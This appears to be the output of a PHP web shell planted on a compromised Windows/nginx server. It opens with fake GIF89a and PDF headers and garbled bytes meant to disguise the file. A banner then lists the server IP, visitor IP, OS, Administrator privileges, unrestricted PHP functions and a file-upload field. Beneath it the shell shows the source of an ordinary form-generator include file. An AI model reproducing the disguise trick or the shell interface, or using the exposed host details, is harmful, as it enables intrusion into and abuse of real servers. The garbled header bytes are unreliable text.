GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/_info/form/ |
Upload File : |
<? // _info/form/infoForm_Code_AddEditForm.phpinc // Display the Add/Edit form code. #t_Begin(); // Begin TRACKing included file. $codeOutput = ''; $codeOutput .= " <? // ".$f['filenameBase']."Form.phpinc // Display the ".basename($f['filenameBase'])." Add/Edit form. #t_Begin(); // Begin TRACKing included file. require('".$f['filenameBase']."FormPreset.phpinc');"; switch( $f['displayFormUsing'] ) { case 'css': require('_info/form/infoForm_Code_AddEditForm_CSS.phpinc'); break; case 'table': require('_info/form/infoForm_Code_AddEditForm_Table.phpinc'); break; default: programmingError('The displayFormUsing ('.$f['displayFormUsing'].') is of incorrect type.'); } $codeOutput .= " #t_End(); // End TRACKing included file. ?> "; // form_code. if ( !isset($f['form_code_value']) ) $f['form_code_value'] = 0; ?> <a name="form_code_name"></a> <input type="hidden" name="f_form_code_value" id="form_code_value_id" value="<?=$f['form_code_value']?>"> <table><tr><td><fieldset><legend><a href="#form_code_name" name="f_form_code" onClick="return info_Set(this);"><div id="form_code_status" class="inline"><? if ( !$f['form_code_value']) { ?>+<? } else { ?>-<? } ?></div> Form code <span class="small_info">(using <?=$f['displayFormUsing']?>)</span></a><input type="submit" name="f_subtask" value="Update form" onClick="info_gotoName(this,'form_code_name');"></legend> <div id="form_code_show" class="<? if ( !$f['form_code_value']) { ?>d_s_h <? } ?>d_s_l"> <textarea class="code_info" wrap="off"><?=htmlView(trim($codeOutput))."\n"?></textarea> </div> </fieldset></td></tr></table> <? #t_End(); // End TRACKing included file. ?>